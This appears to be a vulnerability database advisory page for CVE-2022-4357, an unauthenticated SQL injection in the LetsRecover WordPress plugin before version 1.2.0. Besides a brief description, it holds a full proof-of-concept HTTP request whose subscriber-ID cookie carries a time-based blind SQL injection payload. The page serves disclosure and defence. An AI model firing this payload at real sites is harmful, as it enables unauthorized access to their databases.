Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitDaniel KrohmerWPEX-ID:4D1C0886-11F7-494F-B175-691253F46626
HistoryDec 12, 2022 - 12:00 a.m.

LetsRecover < 1.2.0 - Unauthenticated SQLi

2022-12-1200:00:00
Daniel Krohmer
221
sql injection
unauthenticated
letsrecover
version 1.2.0

EPSS

0.002

Percentile

53.1%

JSON

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

GET /checkout/order-received/30/?key=wc_order_Kwss5kjkrhgKG HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/checkout/
Cookie: wplrp_subscriber_id=5 AND (SELECT 7741 FROM (SELECT(SLEEP(5)))hlAf);
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

Related

cvelist 1
prion 1
wpvulndb 1
nvd 1
cve 1
cvelist
cvelist
CVE-2022-4357 LetsRecover < 1.2.0 - Unauthenticated SQLi
2023-01-02 21:49:11
prion
prion
Sql injection
2023-01-02 22:15:00
wpvulndb
wpvulndb
LetsRecover < 1.2.0 - Unauthenticated SQLi
2022-12-12 00:00:00
nvd
nvd
CVE-2022-4357
2023-01-02 22:15:17
cve
cve
CVE-2022-4357
2023-01-02 22:15:17

EPSS

0.002

Percentile

53.1%

JSON
Related for WPEX-ID:4D1C0886-11F7-494F-B175-691253F46626
cvelist1prion1wpvulndb1nvd1cve1